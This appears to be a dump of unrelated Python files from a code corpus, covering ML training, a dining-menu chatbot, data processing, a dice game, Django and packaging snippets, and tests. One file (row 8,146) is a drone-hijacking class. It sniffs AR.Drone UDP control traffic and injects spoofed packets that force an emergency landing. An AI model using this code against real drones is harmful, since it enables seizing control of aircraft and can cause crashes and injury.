        shortcut = self.downsample(inputs)
        merged = layers.add([x, shortcut])
        return tf.nn.relu(merged)
class ResNet(keras.Model):
    """1-D ResNet classifier built from six residual stages.

    :param layer_dims: Blocks per stage, e.g. [2, 2, 2, 2, 2, 2].
    :param num_classes: Size of the final logits layer.
    """

    def __init__(self, layer_dims, num_classes=4):
        super(ResNet, self).__init__()
        # Stem: initial conv/BN/ReLU before the residual stages.
        self.stem = Sequential([layers.Conv1D(16, kernel_size=3, strides=1),
                                layers.BatchNormalization(),
                                layers.Activation('relu')
                                ])
        # Residual stages; strides > 1 shrink the sequence length
        # (inline comments give the resulting length for 512-sample input).
        self.layer1 = self.build_resblock(16, layer_dims[0])  # 512
        self.layer2 = self.build_resblock(32, layer_dims[1], kernel_size=5, strides=4)  # 128
        self.layer3 = self.build_resblock(64, layer_dims[2], kernel_size=5, strides=4)  # 32
        self.layer4 = self.build_resblock(128, layer_dims[3], strides=2)  # 16
        self.layer5 = self.build_resblock(256, layer_dims[4], strides=2)  # 8
        self.layer6 = self.build_resblock(512, layer_dims[5], strides=2)  # 4
        # Global pooling collapses the time axis to a 512-wide vector.
        self.avgpool = layers.GlobalAveragePooling1D()
        self.fc = layers.Dense(num_classes)

    def call(self, inputs, training=None):
        x = self.stem(inputs)
        for stage in (self.layer1, self.layer2, self.layer3,
                      self.layer4, self.layer5, self.layer6):
            x = stage(x)
        x = self.avgpool(x)
        return self.fc(x)

    def build_resblock(self, filter_num, blocks, kernel_size=3, strides=1):
        """Stack *blocks* BasicBlocks; only the first may downsample."""
        res_blocks = Sequential()
        res_blocks.add(BasicBlock(filter_num, kernel_size, strides))
        for _ in range(1, blocks):
            res_blocks.add(BasicBlock(filter_num, kernel_size, strides=1))
        return res_blocks
# Load the 512-sample 1-D signals and integer labels from Google Drive.
x_train = np.loadtxt(r'/content/drive/My Drive/Data/x_train').reshape(-1, 512, 1).astype(np.float32)
y_train = np.loadtxt(r'/content/drive/My Drive/Data/y_train').astype(np.int32)
x_test = np.loadtxt(r'/content/drive/My Drive/Data/x_test').reshape(-1, 512, 1).astype(np.float32)
y_test = np.loadtxt(r'/content/drive/My Drive/Data/y_test').astype(np.int32)
train_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(512)
test_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(512)
# sample = next(iter(train_db))
# print(sample)
# Two BasicBlocks in each of the six stages.
model = ResNet([2,2,2,2,2,2])
model.build(input_shape=(512,512,1))
# conv_net.summary()
# fc_net.summary()
optimizer = optimizers.Adam(lr=1e-3)
train_loss = []
test_acc = []
acc_max = 0
for epoch in range(500):
    # --- training pass ---
    for step, (x, y) in enumerate(train_db):
        with tf.GradientTape() as tape:
            # [b,512,1]=>[b,4]
            logits = model(x, training=True)
            y_onehot = tf.one_hot(y, depth=4)
            loss = tf.losses.categorical_crossentropy(y_onehot, logits, from_logits=True)
            loss = tf.reduce_mean(loss)
        grads = tape.gradient(loss, model.trainable_variables)
        optimizer.apply_gradients(zip(grads, model.trainable_variables))
        if step % 100 == 0:
            print(epoch, step, 'loss:', float(loss))
            train_loss.append(loss)
    # --- evaluation pass: accuracy over the whole test set ---
    total_num = 0
    total_correct = 0
    for x, y in test_db:
        logits = model(x)
        prob = tf.nn.softmax(logits, axis=1)
        pred = tf.argmax(prob, axis=1)
        pred = tf.cast(pred, dtype=tf.int32)
        correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)
        correct = tf.reduce_sum(correct)
        total_num += x.shape[0]
        total_correct += int(correct)
    acc = total_correct / total_num
    test_acc.append(acc)
    print(epoch, 'acc:', acc)
    # Checkpoint only when the test accuracy improves.
    if acc > acc_max:
        acc_max = acc
        model.save_weights(r'ResNet/weights.ckpt')
|
8,142 | bf2b3b74f772026328cdd04412455ee758c43d3f | import requests
from google.cloud import datastore
import google.cloud.logging
###Helper functions
def report_error(error_text):
    """Logs error to Stackdriver.

    :param error_text: The text to log to Stackdriver
    :type error_text: string
    """
    logging_client = google.cloud.logging.Client()
    logging_client.logger("automated_error_catch").log_text(error_text)
def get_secrets():
    """Fetches secrets from Datastore and returns them as a list.
    """
    datastore_client = datastore.Client()
    # The 'env_vars' kind is expected to hold exactly one entity.
    entities = list(datastore_client.query(kind='env_vars').fetch())
    return entities[0]
def format_requisites(text, requisites):
    """If any item requisites specified, adds them to response text data for
    more holistic response.

    :param text: The response text data to be formatted
    :type text: string
    :param requisites: Contains information food item must comply with (traits, allergens, etc)
    :type requisites: dict
    """
    # Canonical display names for a few non-obvious requisite codes.
    req_map = {'trait': {'mhealthy': 'healthy'},
               'allergens': {'sesame-seed': 'sesame seeds',
                             'tree-nuts': 'tree nuts',
                             'wheat_barley_rye': 'wheat or barley or rye'}}
    # Build a natural-language trait list, e.g. "healthy, and vegan".
    trait_names = [req_map['trait'].get(t, t) for t in requisites['trait']]
    traits_text = format_plural(', '.join(trait_names).rstrip(', '))
    # Same for allergens, but joined with "or" rather than "and".
    allergen_names = [req_map['allergens'].get(a, a) for a in requisites['allergens']]
    allergens_text = format_plural(', '.join(allergen_names).rstrip(', '))
    allergens_text = allergens_text.replace('and', 'or')
    # Requisite-specific connective phrases.
    if allergens_text:
        allergens_text = ' without ' + allergens_text
    if traits_text:
        traits_text = ' that is ' + traits_text
    # Special-case the "not available" apology so the requisites slot into it.
    if (allergens_text or traits_text) and 'Sorry, that is not available' in text:
        traits_text = traits_text.replace(' that is ', '')
        text = text.replace('Sorry, ', 'Sorry, ' + traits_text + ' ')
        text = text.replace('that is not available', '[meal]')
        return text + allergens_text + ' is not available'
    return text + traits_text + allergens_text
def format_plural(text):
    """Adds 'and' before last item in list of items.

    :param text: The string to be manipulated
    :type text: string
    """
    if ',' not in text:
        return text
    # Insert right after the final comma and its trailing space.
    insert_at = text.rfind(',') + 2
    return '{}and {}'.format(text[:insert_at], text[insert_at:])
def remove_spaces(url_block):
    """Replace spaces with '+' to create a valid URL query fragment.

    :param url_block: The url string to be manipulated
    :type url_block: string
    """
    # str.replace does the same single pass as the previous hand-rolled
    # character loop, in C and in one line.
    return url_block.replace(' ', '+')
def check_meal_available(data, meal):
    """Searches response data to check if meal is available at specified
    location/date.

    :param data: MDining API HTTP response data
    :type data: dict
    :param meal: Name of meal
    :type meal: string
    """
    meal_data = data['menu']['meal']
    # An empty meal mapping means nothing is served; otherwise the meal is
    # available only when the name matches and at least one course exists.
    if meal_data and meal_data['name'].upper() == meal.upper():
        return 'course' in meal_data
    return False
def check_course_available(data, course):
    """Searches response data to check if course is available in specified
    meal.

    :param data: MDining API HTTP response data
    :type data: dict
    :param course: Name of course
    :type course: string
    """
    wanted = course.upper()
    for course_entry in data['menu']['meal']['course']:
        for key, value in course_entry.items():
            if key == 'name' and value.upper() == wanted:
                return True
    return False
def check_item_specifications(item, traits, allergens):
    """Returns true if food item is satisfactory with specified traits and
    allergens.

    :param item: Data of specific food item
    :type item: dict
    :param traits: List of specified traits item must have, can be empty
    :type traits: list
    :param allergens: List of allergens item cannot have, can be empty
    :type allergens: list
    """
    # Any forbidden allergen present disqualifies the item immediately.
    if allergens and 'allergens' in item:
        if any(allergen in item['allergens'] for allergen in allergens):
            return False
    # With no required traits the item automatically qualifies.
    if not traits:
        return True
    # Otherwise every required trait must be listed on the item.
    if 'trait' not in item:
        return False
    return all(trait in item['trait'] for trait in traits)
def get_items(data, requisites, formatted):
    """Returns string of food items of each course in response data for
    fulfillmentText in response to Dialogflow.

    :param data: MDining API HTTP response data
    :type data: dict
    :param requisites: Contains information food item must comply with (traits, allergens, etc)
    :type requisites: dict
    :param formatted: True/False - formats response string if true
    :type formatted: boolean
    """
    traits = requisites['trait']
    allergens = requisites['allergens']
    # Tab/newline wrapping when formatted, comma separation otherwise.
    prefix, suffix = ('\t', '\n') if formatted else ('', ', ')
    returndata = ""
    for course in data['menu']['meal']['course']:
        menu_items = course['menuitem']
        # A single item arrives as a dict; normalize to a list.
        if not isinstance(menu_items, list):
            menu_items = [menu_items]
        for item in menu_items:
            if not check_item_specifications(item, traits, allergens):
                continue
            if 'No Service at this Time' in item['name']:
                continue
            returndata += prefix + item['name'].rstrip(', ') + suffix
    return returndata
def find_item_formatting(possible_matches):
    """Trim redundant meal names from a list of matches for a natural sentence.

    [Chicken during lunch, chicken wings during lunch, chicken patty during dinner]
    becomes [Chicken, chicken wings during lunch, chicken patty during dinner].

    :param possible_matches: Food items in the data that matched user input
    :type possible_matches: list
    """
    for idx in range(1, len(possible_matches)):
        current_meal = possible_matches[idx].split()[-1]
        previous_meal = possible_matches[idx - 1].split()[-1]
        # When consecutive entries share the same meal name, drop it
        # (and the ' during ' connector, 8 characters) from the earlier one
        if current_meal == previous_meal:
            trim = len(current_meal) + 8
            possible_matches[idx - 1] = possible_matches[idx - 1][:-trim]
    return possible_matches
def find_matches(course_data, possible_matches, item_in, meal_name, requisites):
    """Append matches of the requested food item within one course to
    the running list of possible matches.

    :param course_data: Chosen course subsection of MDining API response data
    :type course_data: dict or list
    :param possible_matches: Food items in the data that matched user input
    :type possible_matches: list
    :param item_in: User input food item
    :type item_in: string
    :param meal_name: Name of meal
    :type meal_name: string
    :param requisites: Trait/allergen constraints items must satisfy
    :type requisites: dict
    :returns: ``possible_matches`` with any new matches appended
    :rtype: list
    """
    traits = requisites['trait']
    allergens = requisites['allergens']
    # Normalize to a list: the API returns a bare dict for a single item
    if isinstance(course_data, list):
        item_data = list(course_data)
    else:
        item_data = [course_data]
    for item in item_data:
        if not check_item_specifications(item, traits, allergens):
            continue
        if item_in.upper() in item['name'].upper():
            # Strip trailing spaces locally instead of mutating the shared
            # item dict; rstrip is also safe for empty names, where the
            # original item['name'][-1] check raised IndexError.
            name = item['name'].rstrip(' ')
            possible_matches.append(name + ' during ' + meal_name)
    return possible_matches
#########################################################################
###Primary Handler Functions
def request_location_and_meal(date_in, loc_in, meal_in, requisites):
    """Answer the ``findLocationAndMeal`` intent for a valid location/meal.

    Queries the MDining API for the given place, date and meal, and returns
    either a formatted list of the qualifying items or a "no meal" message.

    :param date_in: Input date
    :type date_in: string
    :param loc_in: Input location
    :type loc_in: string
    :param meal_in: Input meal
    :type meal_in: string
    :param requisites: Trait/allergen constraints items must satisfy
    :type requisites: dict
    """
    # Assemble the API query URL from its fixed base plus the parameters
    base = 'http://api.studentlife.umich.edu/menu/xml2print.php?controller=&view=json'
    query = base + '&location=' + loc_in + '&date=' + str(date_in) + '&meal=' + meal_in
    query = remove_spaces(query)
    # Fetch the menu as JSON
    data = requests.get(query).json()
    # Only report items when the requested meal is actually served
    if not check_meal_available(data, meal_in):
        return "No meal is available"
    items = get_items(data, requisites, False).rstrip(', ')
    return format_plural(items)
#Handle meal item data request
def request_item(date_in, loc_in, item_in, meal_in, requisites):
    """Handles searching for appropriate data response for valid specified
    location and food item entities (and meal entity if included) from ``findItem`` intent.

    Returns a Dialogflow response dict of the form {'fulfillmentText': ...}.

    :param date_in: Input date
    :type date_in: string
    :param loc_in: Input location
    :type loc_in: string
    :param item_in: Input food item
    :type item_in: string
    :param meal_in: Input meal, can be empty string if not specified
    :type meal_in: string
    :param requisites: Contains information food item must comply with (traits, allergens, etc)
    :type requisites: dict
    """
    secrets = get_secrets()
    url = secrets.get('m_dining_api_main')
    location = '&location='
    date = '&date='
    meal = '&meal='
    #API url concatenation
    # NOTE: meal_in is deliberately NOT appended to the URL; all meals are
    # fetched and filtered by name in the loop below.
    location += loc_in
    date += str(date_in)
    url = url + location + date + meal
    url = remove_spaces(url)
    if meal_in == '':
        meal_entered = False
    else:
        meal_entered = True
    #fetching json
    data = requests.get(url).json()
    possible_matches = []
    #Loop through meals
    for i in data['menu']['meal']:
        #If meal specified, only check specified meal
        if meal_entered and i['name'].upper() != meal_in.upper():
            continue
        #Skip meal if no food items available
        if 'course' not in i:
            continue
        #Loop through food items in course
        for j in i['course']:
            for key, value in j.items():
                if key == 'name':
                    course_data = j['menuitem']
                    meal_name = i['name']
                    #Append matches to specified item to possible_matches list
                    possible_matches = find_matches(course_data, possible_matches,
                                                    item_in, meal_name, requisites)
    #Specified item found: build a natural-language sentence with commas
    #and a trailing 'and' between the matches
    if possible_matches:
        possible_matches = find_item_formatting(possible_matches)
        text = 'Yes, there is '
        for i in range(len(possible_matches)):
            if len(possible_matches) > 1 and (i == len(possible_matches) - 1):
                text += ' and'
            text += ' ' + possible_matches[i]
            if i != len(possible_matches) - 1:
                text += ','
    #Specified item not found
    else:
        text = 'Sorry, that is not available'
    return {'fulfillmentText': text}
|
8,143 | f3527185117fd7205f55f47f2f08448a7d7b0100 |
import netCDF4 as nc
import numpy as np
import os
def RangeExtender(filename, directory):
    """Extend an absorption-coefficient netCDF table out to 50000 cm^-1.

    Copies ``nu``/``t_calc``/``p_calc`` from ``directory+filename`` into a
    new file named ``<stem>_50000cm-1.nc``, extending the wavenumber grid
    ``nu`` with the original step size (50000 cm^-1 expressed as
    ``50000*100`` -- presumably nu is stored in m^-1; TODO confirm) and
    zero-padding ``kabs`` over the new range.

    :param filename: name of the input .nc file
    :param directory: directory containing the file (trailing slash expected)
    """
    fileNC = nc.Dataset(directory + filename, 'r')
    nu = fileNC['nu'][:]
    filename, ext = os.path.splitext(filename)
    fileOut = nc.Dataset(directory + filename + "_50000cm-1.nc", 'w')
    nu_orig_length = len(nu)
    # Assumes a uniform grid -- step taken from the first two points
    step = abs(nu[1] - nu[0])
    print(nu, step, len(nu))
    # Convert to a plain Python list so appending is cheap
    nu = [nu[i] for i in range(len(nu))]
    count = 0
    while nu[-1] < 50000 * 100:
        count += 1
        # Progress report every 25k appended points
        if count % 2.5e4 == 0:
            print("{0}, {1:6.5e}".format(len(nu), 50000 * 100 - nu[-1]), end='\r', flush=True)
        nu.append(nu[-1] + step)
    print('\n', len(nu))
    nu_length = len(nu)
    pt_num = len(fileNC['t_calc'])
    # Declare the dimensions and variables of the output file
    nu_dim = fileOut.createDimension('nu', nu_length)
    pt_pair_dim = fileOut.createDimension('pt_pair', pt_num)
    scalar_dim = fileOut.createDimension('scalar', 1)
    nu_var = fileOut.createVariable('nu', 'f8', ('nu',))
    kabs = fileOut.createVariable('kabs', 'f4', ('pt_pair', 'nu',))
    t_calc = fileOut.createVariable('t_calc', 'f8', ('pt_pair',))
    p_calc = fileOut.createVariable('p_calc', 'f8', ('pt_pair',))
    nu = np.array(nu)
    nu_var[:] = nu[:]
    nu_var.step = step
    t_calc[:] = fileNC['t_calc'][:]
    p_calc[:] = fileNC['p_calc'][:]
    k_zero = np.zeros(nu_length)
    # Copy each p/T row, zero-padded over the extended wavenumber range
    for i in range(pt_num):
        print(i, pt_num, end='\r', flush=True)
        k_zero_used = np.copy(k_zero)
        kabs[i, :] = k_zero_used[:]
        kabs[i, :nu_orig_length] = fileNC['kabs'][i, :]
    print('')
    fileNC.close()
    fileOut.close()
# Example invocation: extend one TiO absorption-coefficient table.
filename = 'abs_coeff_TiO_Toto_TerrestrialAbund_pt800.nc'
directory = '/home/dc-ridg1/AbsCoeffs/'
RangeExtender(filename, directory)
|
8,144 | bb540ba4cd96e2485e77ba099f0a1a9ea03e1120 | import random
def multi():
    """Play one player's turn of the dice game Ship, Captain, and Crew.

    Interactive: reads choices from stdin and prints rolls and scores.
    A 6 is the Ship, 5 the Captain, 4 the Crew; once all three are rolled,
    the remaining two dice are the player's cargo (score).
    NOTE(review): scc/cc/crew are mutated by the ``.remove()`` comprehension
    trick below, which is why they are rebuilt on every call.
    """
    scc = [6, 5, 4]
    sc = [6, 5]
    cc = [5, 4]
    crew = [4]
    captain = [5]
    ship = [6]
    n = 0
    while n <= 2:
        inp = input("Hit enter to roll")
        if inp == "":
            roll5 = random.choices(range(1, 7), k=5)
            print(roll5)
            # Case 1: Ship, Captain and Crew all present in the first roll
            if set(scc).issubset(roll5):
                # Remove one 6, 5 and 4; the two leftovers are the cargo
                result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]
                total_scc = sum(result_scc)
                inp_scc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                if inp_scc == "both":
                    print("Total score: " + str(total_scc) + ".")
                if inp_scc == "neither":
                    roll2_scc = random.choices(range(1, 7), k=2)
                    print(roll2_scc)
                    inp_scc_none = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                    if inp_scc_none == "both":
                        total_scc_none = sum(roll2_scc)
                        print("Total score: " + str(total_scc_none) + ".")
                    if inp_scc_none == "neither":
                        roll2_scc_none = random.choices(range(1, 7), k=2)
                        total_scc_none2 = sum(roll2_scc_none)
                        print(roll2_scc_none)
                        print("Your total score is: " + str(total_scc_none2) + ".")
                    if inp_scc_none == "one":
                        inp_scc_none_one = input("Which die do you want to keep? ")
                        roll1_scc_none_one = random.randint(1, 6)
                        total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)
                        print(roll1_scc_none_one)
                        print("Your total score is: " + str(total_scc_none_one) + ".")
                if inp_scc == "one":
                    inp_scc_one = input("Which die do you want to keep? ")
                    roll1_scc_one = random.randint(1, 6)
                    print(roll1_scc_one)
                    total_scc_one = roll1_scc_one + int(inp_scc_one)
                    inp_scc_one2 = input("Hit enter to roll again or type 'pass' to keep your score ")
                    if inp_scc_one2 == "pass":
                        print("Your total score is: " + str(total_scc_one) + ".")
                    if inp_scc_one2 == "":
                        roll1_scc_one2 = random.randint(1, 6)
                        print(roll1_scc_one2)
                        total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
                        print("Your total score is: " + str(total_scc_one2) + ".")
            # Case 2: Ship and Captain rolled; still need the Crew (a 4)
            if set(sc).issubset(roll5):
                inp_sc = input("Now you need a 4(the Crew). Hit enter to roll the remaining dice")
                if inp_sc == "":
                    roll3 = random.choices(range(1, 7), k=3)
                    print(roll3)
                    if set(crew).issubset(roll3):
                        result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]
                        total_crew = sum(result_crew)
                        inp_crew = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                        if inp_crew == "both":
                            print("Total score: " + str(total_crew) + ".")
                        if inp_crew == "neither":
                            roll2_crew = random.choices(range(1, 7), k=2)
                            print(roll2_crew)
                            total_crew_none = sum(roll2_crew)
                            print("Your total score is: " + str(total_crew_none) + ".")
                        if inp_crew == "one":
                            inp_crew_one = input("Which die do you want to keep? ")
                            roll1_crew_one = random.randint(1, 6)
                            print(roll1_crew_one)
                            total_crew_one = roll1_crew_one + int(inp_crew_one)
                            print("Your total score is: " + str(total_crew_one) + ".")
                    else:
                        # One more chance to roll the Crew
                        inp_sc3 = input("Still no 4. Hit enter to roll again")
                        if inp_sc3 == "":
                            roll3_sc3 = random.choices(range(1, 7), k=3)
                            print(roll3_sc3)
                            if set(crew).issubset(roll3_sc3):
                                result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]
                                total_crew_sc3 = sum(result_crew_sc3)
                                print("Your total score is: " + str(total_crew_sc3) + ".")
                            else:
                                print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
            # Case 3: Ship only (a 6 but no 5); need both Captain and Crew
            if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
                inp_ship = input(
                    "Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice ")
                if inp_ship == "":
                    roll4_ship = random.choices(range(1, 7), k=4)
                    print(roll4_ship)
                    if set(cc).issubset(roll4_ship):
                        result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]
                        total_ship_cc = sum(result_ship_cc)
                        inp_ship_cc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
                        if inp_ship_cc == "both":
                            print("Your total is: " + str(total_ship_cc) + ".")
                        if inp_ship_cc == "neither":
                            roll2_cc = random.choices(range(1, 7), k=2)
                            print(roll2_cc)
                            total_ship_cc_none = sum(roll2_cc)
                            print("Your total score is: " + str(total_ship_cc_none) + ".")
                        if inp_ship_cc == "one":
                            inp_ship_cc_one = input("Which die do you want to keep? ")
                            roll1_ship_cc_one = random.randint(1, 6)
                            print(roll1_ship_cc_one)
                            total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)
                            print("Your total score is: " + str(total_ship_cc_one) + ".")
                    if set(captain).issubset(roll4_ship):
                        roll3_captain = random.choices(range(1, 7), k=3)
                        print(roll3_captain)
                        if set(crew).issubset(roll3_captain):
                            result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]
                            total_ship_captain = sum(result_ship_captain)
                            print("Your total score is: " + str(total_ship_captain) + ".")
                        else:
                            print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
        else:
            # Any non-empty input counts the attempt without rolling
            n = n + 1
# Entry point: ask how many players there are and run one turn per player.
inp = input("How many players are there? ")
players = range(int(inp))
roll_dict = dict()  # NOTE(review): never populated or read -- dead variable?
for i in players:
    multi()
8,145 | bf65d4a4e066e3e06b888d4b9ed49e10e66b4e78 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 22 20:21:16 2018
@author: Yijie
"""
# Q4:
# (1) Compare list concatenation with appending whole lists.
yours = ['Yale','MIT','Berkeley']
mine = ['Harvard','CAU','Stanford']
ours1 = mine + yours  # concatenation: a new flat list of six strings
ours2 = []
ours2.append(mine)    # nesting: ours2 stores references to the two lists
ours2.append(yours)
print(ours1)
print(ours2)
# Difference: the printed results show that 'ours1' holds the elements of
# 'yours' and 'mine' together in one flat list, while 'ours2' keeps a
# dividing line between 'yours' and 'mine' (it is a list of two lists).
# (2) Question: what happens when an element of 'yours' is replaced?
yours[1]='Mich'
print(ours1)
print(ours2)
# ours1 stays unchanged because concatenation copied the elements into a new
# list, while ours2 changed because it holds references to the original lists.
8,146 | d9908d1ff155390dcd456dd15f92db03f093089e | #!/usr/bin/env python3
class interceptThread(threading.Thread):
    """Sniffs AR.Drone control traffic (UDP 5556) and injects spoofed commands.

    NOTE(review): relies on scapy (``sniff``, ``sendp``, ``Raw``) and a
    ``dup`` helper module for duplicating packet layers; those imports are
    assumed to be provided elsewhere in the original script.
    """

    # AT*REF argument value that triggers an emergency landing
    EMER = '290717952'

    def __init__(self):
        threading.Thread.__init__(self)
        self.curPkt = None      # most recently sniffed control packet
        self.seq = 0            # last observed AT command sequence number
        self.foundUAV = False   # whether drone traffic has been seen yet

    def run(self):
        # Capture drone control packets forever, handing each to interceptPkt
        sniff(prn=self.interceptPkt, filter='udp port 5556')

    def interceptPkt(self, pkt):
        """Record the latest packet and track the AT sequence number."""
        if not self.foundUAV:
            print('[*] UAV Found.')
            self.foundUAV = True
        self.curPkt = pkt
        raw = pkt.sprintf('%Raw.load%')
        try:
            # Payload starts like 'AT*XXX=<seq>,...'; jump ahead of it by 5
            self.seq = int(raw.split(',')[0].split('=')[-1]) + 5
        except (ValueError, IndexError):
            # Payload did not contain a parsable sequence number
            self.seq = 0

    def injectCmd(self, cmd):
        """Replay the captured packet's headers with a new AT command payload."""
        radio = dup.dupRadio(self.curPkt)
        dot11 = dup.dupDot11(self.curPkt)
        snap = dup.dupSNAP(self.curPkt)
        llc = dup.dupLLC(self.curPkt)
        ip = dup.dupIP(self.curPkt)
        udp = dup.dupUDP(self.curPkt)
        raw = Raw(load=cmd)
        injectPkt = radio / dot11 / llc / snap / ip / udp / raw
        sendp(injectPkt)

    def emergencyland(self):
        """Spoof a watchdog reset followed by an emergency-land command."""
        spoofSeq = self.seq + 100
        watch = 'AT*COMWDG=%i\r' % spoofSeq
        # Bug fix: EMER is a class attribute; inside a method it is not
        # visible as a bare name and must be accessed via self.
        toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, self.EMER)
        self.injectCmd(watch)
        self.injectCmd(toCmd)
|
8,147 | 22504b466cdeb380b976e23e2708e94131722e11 | from django.contrib import admin
from apap.models import *
# Register your models here.
# Expose the app's models in the Django admin interface.
admin.site.register(Doggo)
admin.site.register(Profile)
8,148 | 7903484b4a36d4b6ea03b9eaf3bf2b2e056baad8 | from setuptools import setup, find_packages
def find_version():
    """Extract the __version__ string from pytest_defer.py.

    :returns: the version with its surrounding quotes removed.
    :raises ValueError: if no ``__version__`` assignment is found
        (previously this fell through and raised a confusing NameError).
    """
    with open('pytest_defer.py') as fp:
        for line in fp:
            if '__version__' in line:
                version = line.split('=')[-1].strip()
                return version[1:-1]  # trim surrounding quotes
    raise ValueError('__version__ not found in pytest_defer.py')
# Use the README as the PyPI long description.
with open('README.md') as fp:
    long_desc = fp.read()

setup(
    version=find_version(),
    name='pytest-defer',
    license='MIT',
    long_description=long_desc,
    long_description_content_type='text/markdown',
    author='Miki Tebeka',
    author_email='miki@353solutions.com',
    url='https://github.com/tebeka/pytest-defer',
    packages=find_packages(),
    # Register the plugin under pytest's 'pytest11' entry-point group so
    # pytest auto-loads it when installed.
    entry_points={
        'pytest11': [
            'defer = pytest_defer',
        ],
    },
    install_requires=[
        'pytest>=6.2',
    ],
)
|
8,149 | c87f9885e96abdd32df68f9fe1942b2782bd5b96 | # https://stackoverflow.com/questions/69473844/can-you-calculate-the-size-of-a-text-annotation-in-matplotlib
from matplotlib.figure import Figure as mpl_Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg as mpl_Canvas
# Measure the rendered size of a text annotation: draw the figure on an Agg
# canvas first, then ask the text artist for its window extent.
fig = mpl_Figure()
x, y, text = 5, 7, 'My label text'
fig.gca().plot(x, y, 'k.')
canvas = mpl_Canvas(fig)
t = fig.gca().text(x, y, text, color='red')
canvas.draw()  # a draw is required before get_window_extent() is valid
bbox = t.get_window_extent(renderer=canvas.get_renderer())
# Outline the text's bounding box; transform=None plots in display (pixel)
# coordinates rather than data coordinates.
fig.gca().plot(
    [bbox.x0, bbox.x1, bbox.x1, bbox.x0, bbox.x0],
    [bbox.y0, bbox.y0, bbox.y1, bbox.y1, bbox.y0],
    'k:',
    transform=None)
canvas.print_figure("img.png")
8,150 | 4488612164435ab062ca66000f0d7dc3ccd89da2 | from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerOrStaffOrReadOnly(BasePermission):
    """Allow read access to everyone; write access only to the owner or staff."""

    def has_object_permission(self, request, view, obj):
        """
        Object-level permission check (translated from the original Russian):
        grant full (write) access only to the object's owner or a superuser;
        grant read-only access to everyone.
        Returns True if permission is granted, False otherwise.
        """
        return bool(
            request.method in SAFE_METHODS
            or
            request.user and request.user.is_authenticated
            and
            (obj.owner == request.user or request.user.is_superuser)
        )

    def has_permission(self, request, view):
        # View-level check: unauthenticated users may only use safe
        # (read-only) methods.
        return bool(
            request.method in SAFE_METHODS or
            request.user and
            request.user.is_authenticated
        )
|
8,151 | edb80652de641a1a6cbb37a60cc236cd7828a96e |
'''
给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。
返回被除数 dividend 除以除数 divisor 得到的商
链接:https://leetcode-cn.com/problems/divide-two-integers
'''
# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易
# 我个人思考可以考虑使用上下界,不断缩小范围来确定
def division(dividend, divisor):
    """Integer-divide dividend by divisor without using *, / or %.

    Truncates toward zero and clamps the result to the signed 32-bit range,
    per LeetCode 29 semantics.

    The original implementation only handled non-negative dividends (its
    ``range(dividend + 1)`` loop) and derived the sign from
    ``(dividend ^ divisor) >> divisor.__sizeof__()``, which is incorrect for
    Python's arbitrary-precision ints; it also took O(n) additions.
    """
    INT_MAX = 2 ** 31 - 1
    INT_MIN = -2 ** 31
    # Work with magnitudes; remember whether the result must be negative
    negative = (dividend < 0) != (divisor < 0)
    remainder = abs(dividend)
    base = abs(divisor)
    quotient = 0
    # Repeated doubling via addition only: O(log n) outer steps
    while remainder >= base:
        chunk, count = base, 1
        while chunk + chunk <= remainder:
            chunk += chunk
            count += count
        remainder -= chunk
        quotient += count
    if negative:
        quotient = -quotient
    # Clamp to 32-bit signed range (e.g. INT_MIN / -1 would overflow)
    if quotient > INT_MAX:
        return INT_MAX
    if quotient < INT_MIN:
        return INT_MIN
    return quotient
def division_v2(dividend, divisor):
    """Divide a non-negative dividend by a positive divisor via binary
    search, without using *, / or %. Returns floor(dividend / divisor).

    Fixes two defects in the original: ``round((low + up) / 2)`` uses
    banker's rounding, so e.g. ``round(2.5) == 2`` left ``low`` unchanged
    and the loop never terminated; and ``mid`` was unbound when the loop
    body never ran (dividend == 0).
    """
    def repeated_add(num, times):
        # num * times using only addition
        total = 0
        for _ in range(times):
            total += num
        return total

    low, up = 0, dividend
    # Invariant: repeated_add(divisor, low) <= dividend
    while low < up:
        # Upper midpoint via shift (no division); guarantees progress
        mid = (low + up + 1) >> 1
        if repeated_add(divisor, mid) <= dividend:
            low = mid
        else:
            up = mid - 1
    return low
# Ad-hoc manual check; the division() call is kept for reference.
if __name__ == '__main__':
    # print(division(2147483647, 1))
    print(division_v2(3, 1))
|
8,152 | 27702f72ae147c435617acaab7dd7e5a5a737b13 | import unittest
import subprocess
import tempfile
import os
import filecmp
import shutil
import cfg
import utils
class TestFunctionalHumannEndtoEndBiom(unittest.TestCase):
    """
    Test humann with end to end functional tests
    (biom-format input and output variants; each test shells out to the
    humann executable via utils.run_humann and inspects the output folder).
    """

    def test_humann_fastq_biom_output(self):
        """
        Test the standard humann flow on a fastq input file
        Test biom output is written
        """
        # create a temp directory for output
        tempdir = utils.create_temp_folder("fastq")
        # run humann test
        command = ["humann", "--input", cfg.demo_fastq, "--output", tempdir,
                   "--output-format", "biom"]
        utils.run_humann(command)
        # check the output files are as expected
        for expression, message in utils.check_output(cfg.expected_demo_output_files_biom, tempdir):
            self.assertTrue(expression, message)
        # remove the temp directory
        utils.remove_temp_folder(tempdir)

    def test_humann_fastq_biom_output_pathways(self):
        """
        Test the standard humann flow on a fastq input file
        Test biom output is written
        Test the expected pathways are identified
        """
        # create a temp directory for output
        tempdir = utils.create_temp_folder("fastq")
